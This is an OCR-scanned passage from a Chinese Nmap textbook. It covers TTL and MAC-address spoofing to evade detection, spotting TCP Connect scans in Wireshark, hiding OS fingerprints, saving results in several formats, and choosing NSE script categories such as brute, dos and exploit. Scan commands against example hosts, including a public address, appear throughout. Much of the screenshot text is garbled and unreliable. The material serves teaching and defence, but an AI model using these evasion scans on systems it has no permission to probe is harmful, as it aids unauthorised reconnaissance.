1433/tcp open ms-sql-s 

1434/tcp open ms-sql-m 

2869/tcp open icslap 

6001/tcp open X11:1 

MAC 14D:D4:38:6C:27 (Universal Global Scientific 












































Industrial) 


Nmap done: 1 IP address (1 host up) scanned in 6.49 seconds 




















图 6-12. 在 Zenmap 中 指定 TTL fii 
同样 使 用 Wireshark 抓 取 发 送出 去 的 数据 包 ， 如 图 6-13 所 示 。 
No. | Time | Source Destination Protocol | Lengtl | Info 


28600( 192.168.153.128 10.16.39.8 





= Differentiated Services Field: Ox00 (DSCP Ox00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable 
Total Length: 44 
Identification: Ox35d3 (13779) 


* Flags: 0x00 


Time to live: 25 





图 6-13 使 用 Wireshark 查看 发 送 数据 包 TTL 部 分 的 值 


7. --spoof-mac «mac address , prefix , or vendor name» ( MAC 地 址 欺骗 ) 
通过 这 个 选项 可 以 人 为 指定 Nmap 在 进行 扫描 工作 时 发 送 以 太 网 帧 的 MAC 地 址 。 这 个 
选项 隐 含 地 使 用 了 --send-eth 选项 ， 这 样 Nmap 发 送 的 才 是 真正 的 以 太 网 包 。 其 中 Nmap 支 
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持 多 种 格式 ， 如 果 简单 地 使 用 字符 串 “0”， 


Nmap 选择 一 个 完全 随机 的 MAC 地 址 。 如 果 给 


定 的 字符 是 一 个 使 用 分 号 分 隔 的 十 六 进 制 偶数 ，Nmap 将 使 用 这 个 MAC 地 址 。 如 果 是 小 于 


12 的 十 六 进 制 数字 ，Nmap 会 随机 填充 剩 下 的 6 个 字 节 。 如 果 参 数 不 是 0 或 十 六 进 制 字符 


p 





Nmap 将 通过 Nmap-mac-prefixes 查找 厂商 的 名 称 (区 分 大 小 写 )， 如 果 找 到 匹配 ，Nmap 将 使 


用 厂商 的 OUI (3 字 节 前 


级 )， 然 后 随机 填充 剩余 的 3 个 节 字 。 下 面 给 出 了 几 个 





mac 参数 : Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2 fil Cisco. 


目标 : 








c» Zenmap 
扫描 (a) IAD MB) 帮助 H) 


10.16.39.8 


图 6-14 中 给 出 了 伪造 MAC 地 址 的 扫描 方法 。 








[| e= 





命令 :nmap -sn -PR --spoof-mac 0 10.16.39.8 








(Lam. ss ) 





Nmap aen | eae | seres | a 





操作 系统 主机 
W bogon(101 





nmap -sn -PR --spoof-mac 0 10.16.39.8 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-08 12:04 ?D1útêx?è 
£2 

Spoofing MAC address ETIPEEEZEEPEIE (No registered vendor) 

Nmap scan report for bogon (10.16.39.8) 

Host is up (0.001@s latency). 

MAC Address: EC:4D:D4:3B:6C:27 (Universal Global Scientific 
Industrial) 

Nmap done: 1 IP address (1 host up) scanned in 2.16 seconds 


























图 6-14 在 Zenmap 中 使 用 伪造 的 MAC 地 址 进行 扫描 
同样 使 用 Wireshark 抓 取 发 送出 去 的 数据 包 ， 捕 获 到 的 数据 包 如 图 6-15 所 示 。 


Time Source 


74 0.943991 
382 3.397588 
773 4.611968 Universa 00:d1:5f ^ Broadcast 

1300 8.748639 Tp-LinkT d8:4f:e3 Broadcast 
1396 9.439263 b0:d9:24:62:fb:c4 ^ Broadcast 


Hangzhou 53:fa:d6 Universa 3c:59:11 
Universa 24:8e:f7 ^ Broadcast 


Destination Protocol Length Info 


E 确 的 --spoof- 


60 10.16.39.254 is at 00:23:89:53:fa:d0 [E] 
60 Who has 10.16.39.205? Tell 10.16.39... 
60 Who has 10.16.39.236? Tell 10.16.39... 
60 Who has 10.16.39.253? Tell 10.16.39... 
42 Who has 10.16.39.8? Tell 10.16.39.44. ~ 








>ò Frame 1396: 42 b 


> [Duplicat. 


e IP"address det: 








> Address Resolution Protocol erus 


图 6-15 使 用 Wireshark 查看 发 送 数据 包 MAC 地 址 的 值 
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6.2 TCP Connect 扫描 的 检测 


我 们 首先 介绍 在 网 络 中 如 何 检测 Nmap 发 出 的 TCP Connect 类 型 的 扫描 。 因 为 这 是 一 种 
最 为 基本 的 扫描 方式 ，Nmap 向 一 个 开放 的 端口 发 起 了 连接 请 求 ， 并 且 完 成 了 三 次 握手 ， 之 
后 结束 了 这 次 连接 。 这 种 扫描 很 容易 被 检测 到 ， 因 为 Nmap 会 向 每 一 个 目标 端口 发 送 一 个 
SYN 数据 包 ， 如 果 该 端口 是 关闭 的 ， 目 标 会 回复 一 个 设置 了 RST 和 ACK 标识 位 的 数据 包 。 
如 果 该 端口 是 开放 的 ， 目 标 会 回复 一 个 设置 了 SYN/ACK 标志 位 的 数据 包 。 然 后 Nmap 会 发 
送 一 个 设置 了 ACK 标志 位 的 数据 包 来 完成 三 次 握手 ， 在 这 个 过 程 中 会 产生 大 量 的 错误 消息 。 
而 这 些 消息 会 被 记录 下 来 。 

下 面 在 主机 ( 192.168.153.128 ) 上 对 目标 主机 10.16.39.44 发 起 一 次 TCP Connect 类 型 的 
扫描 。 

Nmap -sT 10.16.39.44 


同时 在 目标 主机 (10.16.39.44) 上 使 用 Wireshark 进行 抓 包 ， 捕 获 到 的 信息 如 图 6-16 所 示 。 



































日 NEV mec Qu) eus FEW IAD eme 
e JARA esst 











Tine Source Best Protocol Length Info 

9852 160.143772 1.191.13.245 .16.39. UDP 89 17615 + 9909 Len-47 

9853 160.148522 。 113.195.78.195 19.16.39.44 Upp 88 53041 + 9909 Len=46 
88 17615 + 9909 

















图 6-16 使 用 Wireshark 查看 10.16.39.44 发 送 和 接收 的 数据 包 
从 这 里 可 以 看 出 ， 在 这 段 时 间 中 有 大 量 的 TCP Connect 活动 出 现 。 事 实 上 ， 如 此 频繁 地 
对 大 量 的 TCP 端口 发 起 连接 很 可 能 意味 着 有 人 正在 对 你 的 主机 进行 扫描 。 如 果 网 络 中 部 署 了 
网 络 人 侵 检 测 设 备 ， 一 定时 间 段 内 会 话 的 数量 超过 了 设 定 的 阔 值 就 会 报警 。 
首先 查找 在 当前 网 络 中 占用 资源 最 多 的 节点 ， 如 图 6-17 所 示 进 行 操作 。 
然后 在 统计 窗口 中 选中 IPV4， 单 击 Packets 标题 进行 排序 ， 将 收发 包 最 多 的 主机 找 出 











来 ， 如 图 6-18 所 示 。 

根据 图 6-18 的 显示 ，192.168.153.128 在 这 一 段 时 间 中 发 送 了 大 量 的 数据 包 ， 显 然 已 经 
找到 了 网 络 中 大 规模 流量 的 源头 。 接 下 来 研究 一 下 192.168.153.128 在 这 段 时 间 都 做 了 哪些 网 
络 行为 。 使 用 这 个 IP 地 址 作为 过 滤 条 件 ， 如 图 6-19 所 示 。 
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文件 (有 SRE RAV BERG) WRO 分析 (A) 
4":e6 ;5RxEEÉS T 


应 用 














9850 160.024703 1.191.13 
9851 160.087864 1.191.13 
9852 160.143772 1.191.13 
9853 160.148522 113.195. 
9854 160.234761 





Frame 9861: 74 bytes on wire (592 bits) 
Ethernet II, Src: Vmware 18:20:20 (00:6 
Internet Protocol Version 4, Src: 192.1 
Transmission Control Protocol, Src Port 





Vo ERO) 
服务 响应 时 间 


DHCP (BOOTP) Statistics 
ONC-RPC programs 
29West 

ANCP 

BACnet 

Collectd 

DNS 

流量 图 

HART-IP 

HPFEEDS 

HTTP 

HTTP2 

Sametime 

TCP 流 图 形 

UDP SMA 


IPv4 Statistics 
IPv6 Statistics 


图 6-17 在 Wireshark 中 使 用 统计 功能 


M Wireshark : Endpoirte- wireshark_5 interfaces 20161111130838_a14164 


(0 te E tn 





IA a [Ease 3 [386 c D [GG sms [ Wr ox 


0 LL co 








| Address. [Packets | Bytes Packets A — B ByesA— B PadketsB — A BytesB—A Latitude Lo ^ 





192.158153.128 — 2151 208 k 1952 143k 1199 54k 














| 121.22.182.117 501 46k 501 45k 0 0- 

| 101257213 360 34k 265 ak o o = 
|10153923 353 55k 353 55k o o- 
[119108225101 — 348 32k 348 3k 0 o- 

1016358 as» mk 313 zt o o 
[11319578105 ^ 296 27k 296 Zk o o- 

[non 315 217 20k 217 2k 0 0- 

| 10.172415 27 19k 207 9t o o 

20) lak o o 201 14k- 
174 16k 0 o 174 16k - 

| 174 16k a 15k o o 
[192158116255 — i74 16k E D E 16k- 

192158116. 174 16k 174 15k 0 0- 

19118856255 174 16k o o ma 16k- 

192188561 174 16k 174 15k o o- 

119113245 163 15k 163 15k 0 0- 

101639255 350 14k o D 150 iak- 

19883911 194 14k 15 “k o o- 

120417738 79 7451 E] 7461 o o- D 
Br E SAHER faari AE 























图 6-18 在 Wireshark 中 查看 流量 最 多 的 主机 
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M Wireshark Endpoints - wireshark _5_interfces_20161111130838_14164 —— Eu 
TA 44 | Ethernet + 31 | gne + 7 | zr - 2091 | we - 3% | 
Address Packets Bytes PacketsA—B BytesA 一 B PacketsB—A BytesB—A Latitud ^ 
10.16.3944 787] 697k 1196 5k 5681 62k- 
[19236815312 EE —45e— — 51421— — — 1198 6k- = 
作为 这 站 要 让 用 ^ 
101.23.63.185 | Ee 0 o- 
121921) SMO me 0 o. 国 
101257313 ær $ and Selected 0 o- 
10163923 ze , or Selected 0 
119.108.225.101 348 32k and not Selected 0 0- | 
10.16.39.8 313 27k 0 0- 
11319578105 296 27k isperat Sdlecied o o- 
110.241.37.5 217 20k 217 20k 0 0- 
101.17.34.15 207 19k 207 19k 0 0- 
|| [22400252 20 14k 0 o 201 uk- 
192.168.56.1 174 16k 174 16k 0 0- 
102 168 56 255. MA 36V n. n Ma IAk. E 
t à , 
COMER —— Commune | 
[mw -]| mm j| crose j| we» | 


























图 6-19 将 192.168.153.128 这 个 IP 地址 设 定 为 过 滤 条 件 
过 滤 后 的 数据 包 如 图 6-20 所 示 。 
amv 分 析 (的 menm FSW IAD BMW 


四 四 日 |9 所 迪 树 万 & 国 国 waea 


B. 153.128. 











Destination 


3175 94.535576 192.168.153.128 10.16.39.44 TCP B 35541 + 135 [SY] 


3178 94.562591 192.168.153.128 10.16.39.44 TCP 2h 35541 * 135 [ach] 
179 94.562592 JEG 12 19.16.39.44 P 135541 + 135 [RS 


图 6-20 使 用 Wireshark 查看 与 192.168.153.128 相关 的 数据 包 


可 以 看 出 ， 在 这 个 时 间 段 内 192.168.153.128 尝试 与 大 量 的 端口 进行 连接 。 

或 者 也 可 以 使 用 tcp.flags==18 作为 过 滤器 ， 直 接 过 滤 那 些 使 用 了 ACK, SYN 标识 的 数 
据 包 ， 如 图 6-21 所 示 。 

同样 可 以 看 出 这 里 面 大 部 分 的 通信 仍然 源 自 192.168.153.128。 

如 果 这 个 扫描 来 自 于 内 部 网 络 ， 我 建议 对 此 进行 跟踪 ， 以 确定 它 为 什么 会 发 送 这 些 流 
量 。 如 果 这 个 扫描 来 自 外 部 网 络 ， 那 么 最 好 检测 自己 的 防火 墙 策略 ， 看 看 为 什么 这 个 流量 会 
到 达 你 的 计算 机 。 也 许 你 的 网 络 防御 措施 已 经 被 破坏 。 
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4-2:0e,;m5E5.eezsspE«aas 











A| ter secte 








Jo. Time Source Destination 


3165 94.532577 10.16.39.44 192.168.153.128 





图 6-21 使 用 tcp.flags==18 作为 过 滤 条 件 显 示 的 数据 包 


63 ”操作 系统 扫描 的 防范 


当 维护 一 个 网 络 的 时 候 ， 最 简单 的 办 法 无 非 为 系统 及 时 打上 补丁 ， 以 及 安装 更 新 。 但 是 
仅仅 这 样 并 不 能 阻止 渗透 者 的 人 侵 ， 最 好 增加 防火 墙 之 类 的 网 络 安全 设备 。 另 外 Morph AI IP 
Personality 这 两 款 软件 也 是 极为 优秀 的 防护 软件 。 当 然 蜜 饶 技 术 也 是 一 个 选择 。 

防范 渗透 者 进行 操作 系统 扫描 最 好 的 办 法 就 是 提供 给 渗透 者 虚假 的 信息 ， 以 此 来 迷惑 渗 
透 者 。 可 以 使 用 Morph 与 IP Personality 来 完成 这 个 任务 。 

Morph 是 Linux 操作 系统 上 的 一 个 程序 。Morph 可 以 将 操作 系统 模拟 成 一 个 其 他 类 型 的 
操作 系统 。 此 时 ，Morph 会 改变 原来 操作 系统 对 TCP、UDP、ICMP 数据 包 的 响应 。 此 时 ， 
当 有 渗透 者 进行 操作 系统 扫描 的 时 候 ， 就 会 得 到 错误 的 操作 系统 信息 。 

IP Personality 是 Linux 上 的 另 一 个 程序 。 这 个 程序 利用 iptables 来 处 理 TCP 和 UDP 的 请 
求 。 这 个 程序 为 我 们 提供 了 进一步 的 操作 系统 隐藏 能 力 ， 渗 透 者 在 你 这 里 获得 的 信息 越 少 ， 
你 的 系统 就 越 安 全 。 





6.4 Nmap 的 格式 化 输出 


如 果 你 是 一 个 职业 的 网 络 渗透 者 或 者 网 络 管理 员 ， 就 会 明白 将 扫描 的 结果 按照 标准 化 的 
格式 输出 的 重要 性 。 尤 其 是 在 对 大 型 网 络 进行 分 析 的 时 候 ， 如 果 没 有 输出 结果 ， 在 整个 扫描 
过 程 中 ， 就 很 有 可 能 遗忘 一 些 重要 的 细节 。 另 外 如 果 你 需要 向 客户 或 者 上 级 报告 情况 ， 一 份 
标准 格式 化 了 的 分 析 报告 会 为 你 节省 很 多 的 时 间 。 

Nmap 在 6.20 版 本 之 后 ， 开 始 支持 现在 广 为 使 用 的 XML 格式 。XML 技术 已 经 广泛 应 用 
于 e-Learning 应 用 系统 的 开发 ， 大 多 数 商 用 e-Learning 平台 都 支持 XML 标准 。 一 些 主要 的 
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网 络 设备 制造 商 如 Cisco, Juniper 等 生产 的 网 络 设备 也 已 提供 了 对 XML 的 支持 ， 以 利于 今 
后 基于 XML 的 网 络 管理 。 
在 本 节 中 将 详细 介绍 Nmap 是 如 何 实现 格式 化 输出 的 。Nmap 中 的 格式 化 输出 包括 以 下 
操作 。 
口 如 何 将 Nmap 的 输出 保存 为 文本 文件 。 
口 如 何 将 Nmap 的 输出 保存 为 XML 文件 。 
口 如 何 将 Nmap 的 输出 保存 为 grep 文件 。 
下 面 先 介绍 一 下 如 何 将 扫描 的 结果 保存 到 一 个 文本 文件 之 中 ，Nmap 语法 如 下 。 
nmap -oN [*.txt] [target] 
例如 将 对 目标 10.16.39.8 的 扫描 结果 保存 到 c:\\test.txt。 
Nmap -oN "c:\\test.txt" 10.16.39.8 
扫描 结果 的 保存 过 程 如 图 6-22 所 示 。 
nens —————— E 
fig) IAD MEC) AMH 
目标 [1016398 [-] xx | [-] Es) ex 
































[ommo] omm] mee [mcm | eon | 主机 明细 | 所 
FT PET nmap -oN "ciMest.bt" 10.16.39.8 m E [sa] 
W/ bogon (101 











Starting Nmap 7.30 ( https: te ) at 2016-11-11 16:54 ?D10+éx?8+?? 
Nmap scan report for bogon (10. .8) 
Host is up (0.0012s latency). 
Not shown: 992 filtered ports 
PORT STATE SERVICE 
80/tcp open http 
135/tcp open msrpc 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
1034/tcp open zincite-a 
1045/tcp open fpitp 
1433/tcp open ms-sql-s 
1434/tcp open ms-sql-m 
14D:04:38:6C:27 (Universal Global Scientific Industrial) 


Nmap done: 1 IP address (1 host up) scanned in 15.01 seconds 
































图 6-22 在 Zenmap 中 将 扫描 结果 保存 到 c:\test.txt 
图 6-23 给 出 保存 了 扫描 结果 的 test.txt 中 的 内 容 。 
下 面 介绍 一 下 如 何 将 扫描 的 结果 保存 到 一 个 XML 文件 之 中 ，Nmap 语法 如 下 。 
nmap -oX [*.xml] [target] 
例如 将 对 目标 10.16.39.8 的 扫描 结果 保存 到 c: West. xml。 


Nmap -oX "c:\\test.xml" 10.16.39.8 
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将 扫描 结果 保存 为 xml 格式 的 过 程 ， 如 图 6-24 所 示 。 





XD SSO ERO ZEV WE 
$ Nmap 7,30 scan initiated Fri Nov 11 16:54:51 2016 as: nmap -oN c:\test. txt -oX c:\users 
\admini 1\appdata\local \temp\zenmap-ebocsv. xml 10. 16. 39. 8 
Nmap scan report for bogon (10. 16. 39. 8) 
Host is up (0. 0012s latency). 
filtered ports 
STATE SERVICE 
open http 








open msrpc 


open netbios-ssn 
open microsoft-ds 
open zincite-a 
open fpitp 
open waT -s 
1434/tcp open 
MAC Address: FFC pm D: (3B: 6C:27 (Universal Global Scientific Industrial) 


# Nmap done at Fri Nov 11 16:55:05 2016 一 1 IP address (1 host up) scanned in 15.01 seconds ~ 
C 











图 6-23 文本 文件 中 的 内 容 


i A) 


ia) IAD MEC HMH) 


目标 [1016398 [7] zx 日 国 m 


命令 ”| nmap -oX "ci\\testxml" 10.16.39.8. 


Inr mr | vom aan [set E735 









































BEER 主机 | nmap -oX “cA\testxml" 10.16.39.8 
" bogon (10.1 











Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-11 16:57 ?D1d+éx?é+27 
Nmap scan report for bogon (10.16.39.8) 
Most is up (0.0013s latency). 
wt MAL 992 filtered ports 
STATE SERVICE 
80/tep open http 
135/tcp open msrpc 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
1034/tcp open zincite-a 
1045/tcp open fpitp 
1433/tcp open ms-sql-s 
1434/tcp open ms-sql-m 
MAC Address: EC:40:04:38:6C:27 (Universal Global Scientific Industrial) 


Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds 



































6-24 在 Zenmap 中 将 扫描 结果 保存 到 c:\test. xml 


图 6-25 给 出 保存 了 扫描 结果 的 test.xml 中 的 内 容 。 

下 面 介绍 一 下 如 何 将 扫描 的 结果 保存 到 一 个 grep 文件 之 中 ，Nmap 语法 如 下 。 
nmap -oG [*.grep] [target] 

例如 将 对 目标 10.16.39.8 的 扫描 结果 保存 到 c: West. grep。 


Nmap -oG "c:\\test. grep " 10.16.39.8 
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将 扫描 结果 保存 为 grep 文件 的 过 程 如 图 6-26 所 示 。 























《pert protocol-'tcp portid="80°><state state-'open" reaccn-'cyncack" 
reason tt1-^128"/»4service name-http' nethod-'tsble* conf-"3'/^4/port? 
(pert protocole'tep" portide'135')4state statce"cpen" rcasone^syn-ack" 
reason :t1-7128"/^Gervice name- msrpc^ methode" table" conf="3”/></port) 
(port protocole tcp" portid-^139'» state state-"epen reason- syn-ack" 
reason 111-^128* /»Xservice name-*netbios-ssn" nethod-* table" conf-"3* /xX/part 


4port protocol-"icp portid="445°><state state-'open" reason-"syn-ack" 
reason tt177128'/5«service name-'microsoft-ds method-"iable" conf="3"/) 
/port> 

port protocole^tcp" portid-'1034"Xstate state=“open” reason= syn-ack” 
reason_ttl="128"/><service nane="zincite-a” nethod="table” cont="3"/>C/part) 
《pert protocole^tcp" portid-'1045'X4state state=“open’ reason=’syn-ack” 
Teason_ttl=“128“/>《service name-"fpitp' method=" table” conf-'3'/2X/port) 
《pert protocol="tcp" portid="1433"X<state state-'open' reason-'syn-ack" 
Teason_ttl=“128“/7>《service nane="ns-sql-s” methode" table” cont="3"/>C/part》 
{port protocol="tcp” portid="1434"X<state statec'open' reason=’syn-ack” 
reason tt1-^128" / service nane="ns-sql-n” method=" table” conf="3"/>C/part》 
ports) 

(times srtt="1320" rttvar="574” to-"100000"/» 

</host> 

< 人 runstats><finished time="1478854665" timestr-'Fri Nov 11 16:57:45 2016“ 

















图 6-25 test.xml 中 的 详细 内 容 
Men dé. TA 


BD IAD REC) foh 
J| Bs [1015505 [-] ez k) 国 sw 


R$: |nmap -oG "cAMtest.grep* 10.16.39.8 


[mm rm 


操作 系统 主机 nmap -oG "cAMest.grep" 10.16.39.8 
W bogon(101 








































































































Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-11 17:06 ?D1ü:àx2ài2? 
Nmap scan report for bogon (10.16.39.8) 

Host is up (0.0012s latency). 

Not shown: 992 filtered ports 

PORT STATE SERVICE 

BO/tcp open http 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

1034/tcp open zinci 

1045/tcp open 
1433/tcp open 
1434/tcp open 









:27 (Universal Global Scientific Industrial) 


Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds 

















图 6-26 在 Zenmap 中 将 扫描 结果 保存 到 cest. grep 
图 6-27 给 出 保存 了 扫描 结果 的 test.grep 中 的 内 容 。 
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[240 S80 vxo) SEV #960 


¥ Nmap 7.30 scan initiated Fri Nov 11 17:06:43 2016 as: nmap -oG c: ^ 
\test. grep -oX c:VusersVadmini 1\appdata\local\temp\zenmap— 
otd2sj. xml 10. 16. 39. 8 
Host: 10.16. 39.8 (bogon) Status: Up 

: 10.16.39.8 (bogon) Ports: 80/open/tcp//http///, 
135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 
445/open/tcp//mi crosoft-ds///, 1034/open/tcp//zincite-a///, 
1045/open/tcp//fpitp///, 1433/open/tcp//ms-sql-s///, 








1434/open/tcp//ms-sql -n/// Ignored State: filtered (992) 
# Nmap done at Fri Nov 11 17:06:57 2016 — 1 IP address (1 host up) 
scanned in 14.47 seconds 





第 1 行 ,第 1 列 

















6-27 test. grep 中 的 详细 内 容 


小 结 


这 一 章 中 首先 介绍 了 Nmap 的 一 些 灵活 的 选项 ， 通 过 这 些 选 项 就 可 以 成 功 地 绕 过 目标 网 
络 的 安全 检查 机 制 。 之 后 也 以 网 络 管理 员 的 角度 使 用 Wireshark 来 分 析 网 络 中 的 人 侵 。 最 后 
介绍 了 Nmap 中 的 报告 输出 方法 。 从 下 一 章 开始 ， 将 介绍 Nmap 中 最 为 强大 的 脚本 编写 部 分 。 
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如 果 说 没有 NSE (Nmap 脚本 引擎 )，Nmap 也 许 已 经 和 同时 期 诞生 的 其 他 软件 一 样 早 被 
人 遗忘 了 。 在 2007 年 谷歌 的 “代码 之 夏 ” 大 会 上 Gordon Fyodor Lyon 发 布 了 NSE。 最 初 的 
脚本 设计 主要 以 改善 服务 和 主机 的 侦 测 为 目的 ， 但 是 很 快 人 们 就 开始 利用 NSE 来 开发 脚本 去 
完成 其 他 的 一 些 任务 。 如 今 ， 正 式 版 的 NSE 已 经 包含 了 14 个 大 类 的 脚本 ， 总 数 达 500 多 个 。 
这 些 脚本 的 功能 包括 对 各 种 网 络 口令 强度 的 审计 、 对 各 种 服务 器 安全 性 配置 的 审计 、 对 各 种 
服务 器 漏洞 的 审计 等 。 

相 比 起 单纯 使 用 一 门 语言 从 头 开 始 编写 一 个 脚本 ， 利 用 强大 的 NSE 来 完成 这 个 任务 要 
容易 得 多 。 因 此 越 来 越 多 工作 在 网 络 安全 方面 的 一 线 工 作者 们 参与 到 NSE 的 脚本 开发 工作 
中 。Nmap 中 的 脚本 库 更 新 的 速度 也 很 快 ， 因 此 经 常 更 新 你 的 脚本 库 是 一 个 很 好 的 习惯 。 

NSE 中 的 脚本 采用 Lua 语言 编写 ,这 门 语言 简单 但 是 功能 却 十 分 强大 。 稍 微 有 些 编程 基 
础 的 开发 者 就 可 以 轻松 地 掌握 Lua 语法 。 利 用 Lua 语言 ， 可 以 快速 地 将 脑海 中 的 想法 变 成 可 
以 运行 的 代码 。 

在 这 一 章 中 ,将 要 讲解 如 下 内 容 。 

Q NSE 脚本 的 运行 。 

Q 如 何 向 NSE 脚本 传递 参数 。 

OQ 扫描 阶段 。 

Q NSE 常见 脚本 的 应 用 。 

口 NSE 开发 环境 的 设置 。 




















e 
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7.1 NSE 脚本 的 运行 


NSE 被 设计 出 来 的 目的 就 是 提高 Nmap 的 灵活 性 。 在 这 一 节 中 将 会 学 习 到 扫描 阶段 NSE 
的 脚本 是 如 何 执行 的 ， 以 及 如 何 对 NSE 中 的 脚本 进行 选择 。 
现在 使 用 NSE 脚本 测试 一 台 服 务 器 。 在 这 个 扫描 过 程 中 添加 一 个 选项 -sC。 
Nmap -sV -sC -0 scanme.Nmap.org 
这 条 命令 在 执行 过 程 中 会 对 目标 主机 进行 操作 系统 的 检测 (-O) 和 目标 系统 上 的 服务 检 
W (-sSV)， 最 重要 的 是 利用 default RU) 分 类 中 所 有 脚本 对 目标 进行 检测 (-sC)。 这 个 分 
类 中 的 脚本 一 般 不 会 对 目标 系统 造成 任何 危害 。 但 是 有 些 脚本 可 能 会 引起 目标 系统 上 的 安全 
防御 措施 的 警报 。 普 通 的 用 户 权限 并 不 能 发 送 原始 套 接 字 ， 这 样 将 会 导致 扫描 的 过 程 变 得 很 
慢 。 而 root 权限 的 用 户 在 使 用 Nmap 时 ， 默 认 的 扫描 方式 就 是 SYN 扫描 。 
Default (默认 ) 分 类 中 的 脚本 包括 如 下 。 
口 bannerNSE : 这 是 一 个 用 来 收集 目标 banner 信息 的 脚本 ， 它 会 连接 到 目标 的 一 个 开放 
的 TCP 端口 ， 然 后 输出 任何 在 5 秒 内 接收 到 的 数据 。 
口 broadcast-ping.NSE: 这 个 脚本 使 用 广播 ping 来 发 现 网 络 中 的 主机 。 
口 dns-recursion.NSE: 这 个 脚本 用 来 检测 一 个 DNS 服务 器 是 否 允许 第 三 方 的 查询 ， 允 许 
这 种 查询 可 能 导致 服务 器 受到 DNS 放大 攻击 。 
口 upnp-info.NSE: 这 个 脚本 尝试 通过 UPnP 服务 来 提取 系统 信息 。 
口 Firewalk.NSE : 这 个 脚本 通过 使 用 了 P 协议 中 的 TTL 过 期 机 制 来 完成 对 防火 墙 设备 的 
发 现 。 
这 里 仅仅 列 出 了 几 个 脚本 ， 与 NSE 中 的 全 部 500 多 个 脚本 相 比 ， 这 只 是 很 少 的 一 部 分 。 
这 些 脚本 的 共同 之 处 就 是 它们 都 是 用 来 实现 对 网 络 进行 信息 收集 。 在 下 一 小 节 中 我 们 将 会 看 
到 NSE 中 脚本 是 如 何 进行 分 类 的 。 


7.1.4. NSE 中 脚本 的 分 类 


目前 ，Nmap 中 将 所 有 的 脚本 按照 功能 规划 成 了 如 表 7-1 所 示 的 分 类 。 
表 7-1 Nmap 中 脚本 的 分 类 

















分 类 描 g 

auth 这 个 分 类 中 包含 的 都 是 负责 处 理 鉴 权 证 书 ( 绕 开 鉴 权 ) 的 脚本 

ARN 这 个 分 类 中 包含 的 都 是 在 局 域 网 内 探查 更 多 服务 开启 状况 ， 如 CHCP, DNS, SQL Server 
等 服务 的 脚本 

brute 这 些 都 是 针对 常见 的 应 用 ， 如 HTTP/FTP 等 使 用 暴力 破解 密码 的 脚本 





default 这 是 使 用 -sC 或 -A 参数 扫描 时 默认 的 脚本 ， 提 供 基 本 脚本 扫描 能 力 


对 网 络 进行 更 多 的 信息 收集 ， 如 SMB 枚 举 、SNMP 查询 等 





discovery 
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( 续 ) 
分 类 Ho x 
dos 用 来 发 起 拒绝 服务 攻击 的 脚本 
exploit 用 来 完成 对 目标 系统 安全 漏洞 渗透 的 脚本 
external 针对 第 三 方 服务 的 脚本 
fuzzer 进行 模糊 测试 的 脚本 ， 发 送 异 常 的 包 到 目标 机 ， 探 测 出 潜在 漏洞 
idis 可 能 会 引起 目标 系统 崩溃 或 者 对 目标 网 络 造成 极 大 负担 的 脚本 。 这 类 脚本 很 容易 被 对 方 
的 防火 墙 或 者 IDS 发 现 
malware 用 来 检测 恶意 软件 的 脚本 
safe 在 任何 情况 下 都 是 安全 无 害 的 脚本 
version 负责 增强 服务 与 版 本 扫描 (Version Detection) 功能 的 脚本 
vuln 负责 检查 目标 机 是 否 有 常见 的 漏洞 ， 如 是 否 有 著名 的 MS08_067 


好 了 ， 现 在 知道 了 NSE 中 将 这 些 脚本 分 成 了 14 个 种 类 。 那 么 如 何 来 执行 这 些 脚 本 呢 ? 


7.1.2. NSE 脚本 的 选择 

在 Nmap 中 你 可 以 轻松 地 在 命令 行 中 输入 --script 选 项 来 完成 对 脚本 的 选择 。 选 
项 --script 后 面 的 参数 值 可 以 是 脚本 的 名 字 (例如 “broadcast-ping”)、 脚 本 的 种 类 (例如 
“discovery”)、 某 一 个 脚本 的 存放 路 径 (例如 /Nmap/scripts/broadcast-ping.NSE),， 或 者 一 个 包 
含 了 多 个 脚本 的 目录 (例如 /Nmap/scripts/), h Nmap 中 也 支持 表达 式 的 使 用 。 下 面 给 出 了 
一 些 具体 的 脚本 选择 实例 。 

Nmap 在 执行 中 可 以 通过 使 用 脚本 的 名 字 来 调用 脚本 ， 例 如 ， 使 用 http-methods 方法 来 
枚 举 出 目标 Web 服务 器 上 所 运行 的 服务 。 

Nmap -p 80,443 --script http-methods 211.81,200.8 

这 个 脚本 的 执行 结果 如 图 7-1 所 示 。 


mm rms E] == E E e 


Se: [nmap p 80443 apt Heip methode 211812008 | 























POST PUT DELETE TRACE OPTIONS 


HEAD 
methodi: PUT DELETE TRACE 




















图 7-1 使 用 http-methods 脚本 扫描 的 结果 
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从 图 7-1 所 示 的 审计 结果 中 可 以 看 出 ， 目 标 服 务 器 所 支持 的 方法 有 GET、HEAD、 
POST、PUT、DELETE、TRACE、OPTIONS 等 7 种 。 存 在 风险 的 方法 有 PUT、DELETE、 
TRACEE。 

或 者 也 可 以 使 用 种 类 的 名 字 来 调用 一 个 分 类 中 的 全 部 脚本 ， 例 如 使 用 safe 分 类 中 的 全 部 
脚本 对 目标 211.81.200.8 进行 检测 。 

Nmap --script safe 211.81.200.8 

另外 ， 也 可 以 同时 使 用 多 个 分 类 中 的 脚本 对 目标 进行 扫描 ， 例 如 使 用 discovery 和 
intrusive 两 个 分 类 中 的 全 部 脚本 对 目标 211.81.200.8 进行 检测 。 

Nmap --script discovery,intrusive 211.81.200.8 

另外 一 个 常见 的 选项 就 是 -sC， 它 是 --scriptDefault 的 缩写 。 也 就 是 使 用 default 分 类 下 
的 脚本 对 目标 进行 扫描 。 

也 可 以 使 用 指定 路 径 的 方式 来 执行 NSE 脚本 。 例 如 脚本 banner 位 于 目录 /Nmap/scripts/ 
下 ， 就 可 以 使 用 这 个 脚本 所 在 的 位 置 进行 选 定 ， 命 令 如 下 。 

Nmap --script /Nmap/scripts/banner.NSE 211.81.200.8 

按照 这 个 方法 ， 也 可 以 一 次 执行 多 个 NSE 脚本 。 例 如 ， 和 希望 同时 使 用 脚本 banner 和 一 
